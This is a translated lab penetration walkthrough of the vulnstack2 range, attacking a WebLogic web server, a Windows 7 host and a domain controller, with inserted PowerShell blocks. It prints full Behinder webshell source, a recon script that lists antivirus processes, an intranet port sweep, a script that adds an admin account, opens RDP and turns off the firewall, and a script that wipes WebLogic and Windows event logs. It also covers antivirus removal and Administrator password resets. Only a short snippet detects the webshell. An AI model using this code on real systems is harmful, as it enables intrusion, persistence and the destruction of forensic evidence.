[Red Sun Target Range] vulnstack2: complete penetration walkthrough

Article directory

  • 1. Network topology
  • 2. Description
  • Configuring the environment
  • Penetration begins
    • Information collection
    • Start attacking
    • Killing the antivirus
    • CS online
      • Privilege escalation
    • Intranet discovery
    • Lateral movement
    • Lateral movement again
    • RDP connection
    • Trace removal
  • Summary

1. Network topology

Network Configuration:

2. Description

The Red Team Combat series builds a set of target ranges modelled on real enterprise environments, to be learned through exercises, video tutorials and blog posts. This red team environment mainly covers Access Token abuse, WMI abuse, domain vulnerability exploitation, SMB relay, EWS relay, PTT (PTC), MS14-068, GPP, SPN abuse, golden/silver tickets, SID History, MOF backdoors and other attack and defence techniques. The unified login password for the range is 1qaz@WSX.

  1. UAC bypass
  2. NTLM capture on Windows (theory: Windows authentication)
  3. Access Token abuse (MSSQL)
  4. WMI abuse
  5. Web proxies, layer-2 proxies, special-protocol proxies (DNS, ICMP)
  6. Information collection inside the domain
  7. Domain vulnerability exploitation: SMB relay, EWS relay, PTT (PTC), MS14-068, GPP, SPN abuse
  8. Domain credential collection
  9. Backdoor techniques (golden ticket / silver ticket / SID History / MOF)
  • Environment statement
    Intranet segment: 10.10.10.1/24
    DMZ segment: 192.168.111.1/24
    Test machine addresses: 192.168.111.1 (Windows), 192.168.111.11 (Linux)
    Firewall policy (once the policy is set, the test machines can only reach 192 addresses, simulating access from the public Internet):
      deny all tcp ports: 10.10.10.1
      allow all tcp ports: 10.10.10.0/24
  • Configuration information
    DC
    IP: 10.10.10.10  OS: Windows 2012 (64-bit)
    Application: AD domain
    WEB
    IP1: 10.10.10.80  IP2: 192.168.111.80  OS: Windows 2008 (64-bit)
    Application: WebLogic 10.3.6, MSSQL 2008
    PC
    IP1: 10.10.10.111  IP2: 192.168.111.201  OS: Windows 7 (32-bit)
    Attack machines
    IP: 192.168.111.1  OS: Windows 11 (64-bit)
    IP: 192.168.111.128  OS: Kali Linux (64-bit)

Configuring the environment

Log in to the WEB host as the de1ay user; the password is 1qaz@WSX.

Here the gateway address is .1, which is the address of the host machine, so there is no external network access. If you want external access, changing the gateway to .2 will do; I only need the internal network here, so I will not change it.


Start WebLogic from C:\Oracle\Middleware\user_projects\domains\base_domain, running it as administrator (administrator / 1qaz@WSX).

Enter the account and password again when prompted, and it starts:


The internal NIC is blocked by the firewall, so the 10 segment cannot be reached from the external network:

Penetration begins

Information collection

Target: 192.168.111.80, the WEB host, is the attack target at the network boundary.
Main services: web, SQL Server, RDP, WebLogic and SMB.

There are multiple vulnerabilities:

Start attacking

Go straight in:

Execute the command: tasklist /svc

Antivirus software is present: 360

Will it kill the shell on upload? Do a plain AV-evasion test first.
First get the path:


It seems to have been killed, so I changed the tool and continued uploading.

Behinder (Ice Scorpion) webshell uploaded successfully:

```jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!
// Loader that turns raw bytes into a class: the decrypted POST body is compiled Java.
class U extends ClassLoader {
    U(ClassLoader c) { super(c); }
    public Class g(byte[] b) { return super.defineClass(b, 0, b.length); }
}
%>
<%
if (request.getMethod().equals("POST")) {
    // This key is the first 16 characters of the 32-character MD5 of the connection
    // password; the default connection password is rebeyond.
    String k = "e45e329feb5d925b";
    session.putValue("u", k);
    // Cipher.getInstance("AES") is AES/ECB/PKCS5Padding on the JDK; mode 2 = DECRYPT_MODE.
    Cipher c = Cipher.getInstance("AES");
    c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
    // base64-decode the body, decrypt it, define it as a class, instantiate it and
    // hand it the pageContext through equals() so the payload can write the response.
    new U(this.getClass().getClassLoader())
        .g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine())))
        .newInstance().equals(pageContext);
}
%>
```

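An added example, not code from the original post, for the key the shell above expects and for the check the other side can run. It assumes the JSP landed somewhere under the base_domain directory the post starts WebLogic from; adjust the path otherwise. Everything else is plain .NET and Windows PowerShell.

```powershell
# Added example, not code from the original post. The shell above keys AES with the
# first 16 hex characters of MD5(connection password); Behinder's default password
# is rebeyond, which is where e45e329feb5d925b comes from. The search path is an
# assumption: the base_domain directory the post starts WebLogic from.

function Get-BehinderKey([string]$Password) {
    $md5  = [System.Security.Cryptography.MD5]::Create()
    $hash = $md5.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Password))
    $hex  = ($hash | ForEach-Object { $_.ToString('x2') }) -join ''
    # 16 hex characters = 16 bytes once k.getBytes() runs on the JSP side (AES-128 key)
    $hex.Substring(0, 16)
}

# Operator side: the constant to paste into the JSP when re-keying the shell.
Get-BehinderKey 'rebeyond'    # e45e329feb5d925b, matches the source above
Get-BehinderKey 'n0tDefault'  # the value a re-keyed copy would carry

# Defender side: the shape of the shell survives renaming and re-keying.
# Flag any JSP that defines a class from request-supplied bytes and decrypts
# the body with AES; no legitimate page does both.
$webRoot = 'C:\Oracle\Middleware\user_projects\domains\base_domain'   # assumption
Get-ChildItem -Path $webRoot -Recurse -Include *.jsp, *.jspx -ErrorAction SilentlyContinue |
    ForEach-Object {
        $src = [System.IO.File]::ReadAllText($_.FullName)
        if ($src -match 'extends\s+ClassLoader' -and
            $src -match 'defineClass' -and
            $src -match 'Cipher\.getInstance\("AES"\)') {
            $key = if ($src -match '"([0-9a-f]{16})"') { $matches[1] } else { 'unknown' }
            '{0}  key={1}  modified={2}' -f $_.FullName, $key, $_.LastWriteTime
        }
    }
```

The defender half deliberately keys on structure rather than on the default key: a re-keyed shell still has to define a class from decrypted bytes, and the LastWriteTime of the hit is the upload time to correlate against the WebLogic access log.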


Got the shell successfully:

Find the location:

Inject a memory shell to get a stable shell:

Information collection: multiple NICs exist

Check whether a domain environment exists:
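An added example, not from the original post, that folds the three checks just done by hand (tasklist /svc for antivirus, ipconfig for extra NICs, the domain check) into one script run through the webshell or beacon. The antivirus process names and the 10.10.10.0/24 prefix are assumptions for this range.

```powershell
# Added example, not code from the original post: the three checks the walkthrough does
# by hand once the webshell works, gathered in one pass. The AV process names are the
# common ones for 360 plus a few others and are an assumption to extend; the
# 10.10.10.0/24 prefix is this range's intranet. Runs on the PowerShell 2.0 that
# Win7/2008 ship with.

# 1. Antivirus: 360's tray, real-time scanner and core-defense processes, plus others.
$avProcesses = @('360tray', '360sd', '360rp', 'ZhuDongFangYu', 'MsMpEng', 'kxetray', 'ekrn')
$running = Get-Process | Select-Object -ExpandProperty ProcessName
$avFound = $running | Where-Object { $avProcesses -contains $_ } | Sort-Object -Unique
if ($avFound) { "AV running: $($avFound -join ', ')" } else { 'No known AV process found' }

# 2. Network position: more than one non-loopback IPv4 address means a second NIC;
#    an address in the intranet segment makes this host the pivot.
$ips = [System.Net.Dns]::GetHostAddresses($env:COMPUTERNAME) |
    Where-Object { $_.AddressFamily -eq 'InterNetwork' } |
    ForEach-Object { $_.IPAddressToString }
"IPv4 addresses: $($ips -join ', ')"
$internal = @($ips | Where-Object { $_ -like '10.10.10.*' })
if ($internal.Count -gt 0) { "Dual-homed: reaches 10.10.10.0/24 via $($internal -join ', ')" }

# 3. Domain membership, read locally (no traffic to the DC yet).
$cs = Get-WmiObject -Class Win32_ComputerSystem
if ($cs.PartOfDomain) {
    "Domain-joined: $($cs.Domain)  logon server: $env:LOGONSERVER  user: $env:USERDOMAIN\$env:USERNAME"
} else {
    "Workgroup host: $($cs.Workgroup)"
}
```

Everything here reads local state only, so it raises nothing on the DC; the first outbound noise comes later with the intranet sweep.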

Since 360 was detected above, we need to find a way to kill it.

Killing the antivirus

  1. Get onto 3389 and close it directly; this requires creating an administrator user.
  2. Escalate privileges and shut it down as SYSTEM.
  3. Make the C2 evade detection.
Create the user:

net user julien 1qaz@WSX /add
net localgroup Administrators julien /add


The connection reports an error:

Log in as the Administrator user; if you do not know the password, just change it directly (fine in the range; on a real engagement resetting the built-in Administrator password is destructive and immediately noticed):

net user Administrator 1qaz@WSX


Logged in

Uninstall it directly

Turn off the firewall and do whatever you want!!

CS online

Bring the CS payload online:
Generate the payload, upload it and run it


Capture clear-text passwords:



MSSQL also has a weak password, and the domain account's username and password are there too

Privilege escalation

Use ms14-058 to escalate privileges

Got SYSTEM privileges:

Intranet discovery

CS discovers nothing

Try fscan instead:
10.10.10.10 is found
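An added example, not from the original post: a minimal TCP connect sweep of the 10.10.10.0/24 segment run from the dual-homed WEB host, standing in for fscan when CS's own discovery comes back empty. The port list and the 300 ms timeout are assumptions for this range.

```powershell
# Added example, not code from the original post. Connect-scans 10.10.10.0/24 from the
# pivot for the ports that matter in this range (SMB, RDP, MSSQL, WebLogic, HTTP).
# Timeout is an assumption; raise it on a slow link. A connect scan completes the
# handshake, so every hit is logged by the target and visible to an EDR.

function Test-Port([string]$Ip, [int]$Port, [int]$TimeoutMs = 300) {
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        $async = $client.BeginConnect($Ip, $Port, $null, $null)
        # No answer within the timeout: filtered or host down, treat as closed.
        if (-not $async.AsyncWaitHandle.WaitOne($TimeoutMs, $false)) { return $false }
        $client.EndConnect($async)   # throws on an RST (refused)
        return $true
    } catch { return $false } finally { $client.Close() }
}

function Invoke-Sweep([string]$Prefix, [int[]]$Ports) {
    $hits = @{}
    foreach ($i in 1..254) {
        $ip = "$Prefix.$i"
        $open = $Ports | Where-Object { Test-Port $ip $_ }
        if ($open) { $hits[$ip] = $open }
    }
    $hits
}

$result = Invoke-Sweep -Prefix '10.10.10' -Ports 445, 3389, 1433, 7001, 80
foreach ($ip in ($result.Keys | Sort-Object { [version]$_ })) {
    $open = $result[$ip]
    $tag = if ($open -contains 445 -and $open -contains 3389) { 'Windows host' } else { '' }
    '{0,-15} open: {1} {2}' -f $ip, ($open -join ','), $tag
}
```

The sweep is sequential, so the worst case is 254 hosts times five ports times the timeout, a few minutes on a dead segment; that is the price of staying on stock PowerShell 2.0 without jobs. 445 plus 3389 on 10.10.10.10 is the DC the post finds with fscan, and 1433 only on .80 confirms the MSSQL instance is on the WEB host.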

Get msf online:

Upload and run:

Set up a SOCKS4 proxy:

Connect Kali to the SOCKS proxy

192.168.111.201 discovered:

CS ARP discovery:

192.168.111.2 and .128 are my own host and Kali, so I leave them out; the SMB beacon is online, try lateral movement

Lateral movement

Bring the target online with an SMB beacon:

Successfully online:

Check whether there is antivirus software:


And 360 again:

Enable 3389: grab the password and log in over RDP

Check the administrator user:


Tried logging in to 3389 as administrator and as mssql: (failed)


Discover other hosts directly:

10.10.10.10 was discovered earlier, so try it directly here:

Moving laterally again:

Lateral movement again

Got access:

RDP connection

Change the Administrator password and log in to 3389:


Laughing to death

Create a user to continue:


Note that there will be a pop-up window like this:
This is where I logged in

After all that hard work I finally got in, and went to kill the antivirus.


Turn off the firewall:

Go after the hosts on the 10 segment again:
3389 was also opened

Since the hosts on the 10 segment are on the internal network, they cannot be connected to directly and must be reached through SOCKS:
First check whether there is antivirus software:

None:

Use the command to turn off the firewall here:

Because our host cannot reach 10.10.10.10 directly (it actually can, but we pretend it cannot), set up SOCKS5:

Connect the shell tool through the proxy:

Then grab the account and password:

Why are they all empty, with no password:
Create a user directly and add it to the group:
net user julien 1qaz@WSX /add
net localgroup administrators julien /add
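An added example, not from the original post, covering this step and the same sequence in the antivirus-killing section earlier: create the admin user, enable 3389 and drop the firewall, with the two commands the post leaves out (the RDP registry flag and the netsh calls) and checks before and after. The username and password are the range's; the script must run elevated, and everything it calls is stock Windows tooling.

```powershell
# Added example, not code from the original post: the "create an admin, open 3389,
# drop the firewall" sequence the walkthrough repeats on the WEB host, the PC and the
# DC. Username/password are the range's. Run from an elevated beacon or shell; needs
# the PowerShell 2.0 that Win7/2008 ship with.

$user = 'julien'
$pass = '1qaz@WSX'

# Local admin is required for all of this; bail early instead of half-applying.
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()
           ).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
if (-not $isAdmin) { throw 'Not elevated: escalate first (the post used ms14-058).' }

# Local account in the Administrators group. On the target this is Security event
# 4720 (user created) followed by 4732 (added to a local group).
if (-not (Get-WmiObject Win32_UserAccount -Filter "LocalAccount=True and Name='$user'")) {
    net user $user $pass /add | Out-Null
}
net localgroup Administrators $user /add | Out-Null

# Enable RDP: clear the Terminal Server deny flag, then allow the built-in
# "Remote Desktop" rule group so 3389 answers even if the firewall stays on.
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' `
    -Name fDenyTSConnections -Value 0
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes | Out-Null

# The post simply turns the firewall off for every profile; same command here.
netsh advfirewall set allprofiles state off | Out-Null

# Verify: member of the group, deny flag cleared, listener actually up.
$inGroup   = (net localgroup Administrators) -contains $user
$rdpOn     = (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server').fDenyTSConnections -eq 0
$listening = (netstat -ano | Select-String ':3389\s+.*LISTENING') -ne $null
'admin={0} rdpEnabled={1} listening3389={2}' -f $inGroup, $rdpOn, $listening
```

The final line is the check to read before wasting time on a proxied RDP client: if listening3389 is False the service has not started yet (it can take a few seconds after the flag flips), and no amount of SOCKS debugging will help.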


Connect directly with the shell tool:

The proxy used is the one above:

The proxy seems to be failing here:

Then just use Kali's RDP client directly.

proxychains rdesktop -g 1440x900 -r disk:LinuxDisk=/root/Downloads -u julien -p "1qaz@WSX" 10.10.10.10:3389

Kali connection failed:


Try to find the problem in CS:
Check the port:

Check with nmap:

If there is no problem, try connecting again:
Connect directly from a host already compromised: here the domain controller on the 10 segment is reached successfully from the Windows 7 machine above:

Connected successfully.

Trace removal

Don't forget to delete the various logs, especially the WebLogic logs. Users can be created with hidden methods; creating shadow accounts will be covered later and is not shown here. Trace removal means going back along the path you came in by. There are many tools you can use; find them yourself, I will not leave them here!
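An added example, not from the original post, of the cleanup the paragraph describes, together with the caveat a defender knows. The WebLogic log locations follow the default base_domain layout and are an assumption; the account name is the one created above.

```powershell
# Added example, not code from the original post: cleanup of what this walkthrough
# left behind. Caveat a defender knows: clearing the Security log writes event 1102
# and clearing System writes 104, so an emptied log is itself an indicator, and it
# does nothing about copies already forwarded to a SIEM. WebLogic paths are the
# default base_domain layout and an assumption for this range.

$user       = 'julien'
$domainHome = 'C:\Oracle\Middleware\user_projects\domains\base_domain'   # assumption
$weblogicLogs = @(
    "$domainHome\servers\AdminServer\logs\*",   # access.log, AdminServer.log, base_domain.log
    "$domainHome\bin\*.log"                     # console output if started with redirection
)

# 1. The account created during the engagement, and its profile if it ever logged in.
if (Get-WmiObject Win32_UserAccount -Filter "LocalAccount=True and Name='$user'") {
    net user $user /delete | Out-Null
    Remove-Item "C:\Users\$user" -Recurse -Force -ErrorAction SilentlyContinue
}

# 2. Application logs that recorded the webshell upload and every POST to it.
#    Truncate rather than delete: WebLogic keeps the file handle open, and a
#    deleted-but-open file keeps growing unseen until the server restarts.
foreach ($p in $weblogicLogs) {
    Get-ChildItem $p -ErrorAction SilentlyContinue | ForEach-Object {
        Clear-Content $_.FullName -ErrorAction SilentlyContinue
    }
}

# 3. Event logs. wevtutil cl empties the channel; the "log cleared" record remains.
foreach ($log in 'Security', 'System', 'Application', 'Windows PowerShell') {
    wevtutil cl "$log" 2>$null
}
# The RDP channel that recorded the 3389 logons made above (Win7 / 2008 R2 and later).
wevtutil cl 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' 2>$null
```

The firewall profiles and the RDP flag changed earlier should be restored as well, and the beacon and webshell files removed; those are simple reversals of the commands used to set them and are not repeated here.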

Summary

Penetration testing can be carried out in many ways; this is just my favourite. On the intranet you can also capture hashes and use them in other ways, which will come up in later entries of the Red Sun range series.